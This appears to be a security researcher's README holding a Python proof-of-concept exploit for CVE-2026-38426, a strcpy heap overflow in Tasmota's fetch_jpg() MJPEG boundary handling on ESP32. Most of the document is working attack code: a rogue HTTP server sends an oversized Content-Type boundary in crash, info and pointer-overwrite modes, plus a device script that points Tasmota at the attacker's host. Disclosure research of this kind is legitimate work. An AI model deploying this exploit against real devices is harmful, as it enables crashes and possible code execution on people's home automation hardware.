README.md
Rendering markdown...
#!/usr/bin/env python3
"""
PoC: CVE-2026-38426
Target: Tasmota <= 15.3.0.3
File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
Function: fetch_jpg() case 0
Vulnerability:
char boundary[40] — fixed 40-byte buffer in jpg_task struct.
Server's Content-Type header value after '=' is copied via strcpy()
with NO length validation:
String boundary = http.header("Content-Type");
char *cp = strchr(boundary.c_str(), '=');
if (cp) {
strcpy(glob_script_mem.jpg_task.boundary, cp + 1); // VULNERABLE
}
Attack:
Attacker controls MJPEG server Tasmota connects to.
Sends Content-Type header with boundary > 39 chars.
strcpy overflows boundary[40] → corrupts adjacent heap memory.
Memory layout (ESP32 heap, approximate):
[boundary[40]] [draw] [scale] [xp] [yp] [WiFiClient] [HTTPClient]
Overflow corrupts: draw, scale, xp, yp, WiFiClient vtable ptr → RCE
Tasmota script to trigger:
>D
>B
fetchjp(ATTACKER_IP:8888/stream,0,0,1)
Usage:
python3 CVE-2026-38426_poc.py --ip 0.0.0.0 --port 8888 --mode crash
python3 CVE-2026-38426_poc.py --ip 0.0.0.0 --port 8888 --mode info
Author: Saidakbarxon Maxsudxonov
CVE: CVE-2026-38426
"""
import socket
import argparse
import struct
import time
from datetime import datetime
BANNER = """
╔══════════════════════════════════════════════════════╗
║ CVE-2026-38426 PoC — Tasmota fetch_jpg() ║
║ strcpy() Buffer Overflow → boundary[40] ║
║ Affected: Tasmota <= 15.3.0.3 (ESP32) ║
╚══════════════════════════════════════════════════════╝
"""
def log(msg, level="*"):
ts = datetime.now().strftime("%H:%M:%S")
print(f"[{ts}] [{level}] {msg}")
def build_overflow_boundary(mode):
"""
boundary[40] is on the heap.
Adjacent memory after boundary[40]:
+0x28: bool draw (1 byte)
+0x29: uint8_t scale (1 byte)
+0x2A: uint16_t xp (2 bytes)
+0x2C: uint16_t yp (2 bytes)
+0x2E: WiFiClient (vtable ptr at offset 0)
Overflow 44 bytes: fills boundary + overwrites draw,scale,xp,yp
Overflow 48+ bytes: reaches WiFiClient vtable pointer → RCE
"""
if mode == "info":
# 44 bytes: minimal crash — overwrites adjacent fields
overflow = b"A" * 44
log("Mode: INFO — 44 byte overflow (adjacent field corruption)", "+")
elif mode == "crash":
# 64 bytes: guaranteed crash — corrupts WiFiClient object
overflow = b"B" * 39 + b"\x00" + b"C" * 24
log("Mode: CRASH — 64 byte overflow (WiFiClient corruption)", "!")
else:
# Custom: try to overwrite function pointer for RCE demo
# ESP32 Xtensa uses little-endian 32-bit pointers
# This would need real target analysis for actual RCE
overflow = b"A" * 44 + struct.pack("<I", 0x41414141)
log("Mode: RCE DEMO — overwrite ptr with 0x41414141", "!")
return overflow
def make_malicious_response(boundary_payload):
"""Build HTTP response with malicious Content-Type boundary"""
boundary_str = boundary_payload.decode('latin-1', errors='replace')
response = (
f"HTTP/1.1 200 OK\r\n"
f"Content-Type: multipart/x-mixed-replace; boundary={boundary_str}\r\n"
f"Connection: keep-alive\r\n"
f"\r\n"
)
return response.encode('latin-1', errors='replace')
def handle_client(conn, addr, mode):
log(f"Tasmota device connected: {addr[0]}:{addr[1]}", "+")
try:
# Receive HTTP GET request
request = conn.recv(1024).decode('utf-8', errors='ignore')
log(f"Request received: {request.splitlines()[0] if request else 'empty'}")
# Build overflow payload
payload = build_overflow_boundary(mode)
log(f"Overflow payload: {len(payload)} bytes")
log(f"Payload (hex): {payload[:64].hex()}")
# Send malicious response
response = make_malicious_response(payload)
conn.send(response)
log(f"Malicious Content-Type sent ({len(payload)} byte boundary)", "!")
log("strcpy() will overflow boundary[40] on target device", "!")
log("Expected: ESP32 crash/reboot (Guru Meditation Error)", "!")
# Keep connection alive briefly
time.sleep(2)
except Exception as e:
log(f"Error: {e}", "-")
finally:
conn.close()
log(f"Connection closed: {addr[0]}")
def main():
print(BANNER)
parser = argparse.ArgumentParser(description="CVE-2026-38426 PoC Server")
parser.add_argument("--ip", default="0.0.0.0", help="Listen IP")
parser.add_argument("--port", type=int, default=8888, help="Listen port")
parser.add_argument("--mode", choices=["info","crash","rce"],
default="crash", help="Overflow mode")
args = parser.parse_args()
log(f"CVE-2026-38426 PoC Server starting", "+")
log(f"Listening on {args.ip}:{args.port}", "+")
log(f"Mode: {args.mode}", "+")
log("─" * 54)
log("Tasmota script to trigger vulnerability:")
log(f' >D')
log(f' >B')
log(f' fetchjp(YOUR_IP:{args.port}/stream,0,0,1)')
log("─" * 54)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((args.ip, args.port))
server.listen(5)
log("Waiting for Tasmota device to connect...", "*")
try:
while True:
conn, addr = server.accept()
handle_client(conn, addr, args.mode)
except KeyboardInterrupt:
log("Server stopped")
finally:
server.close()
if __name__ == "__main__":
main()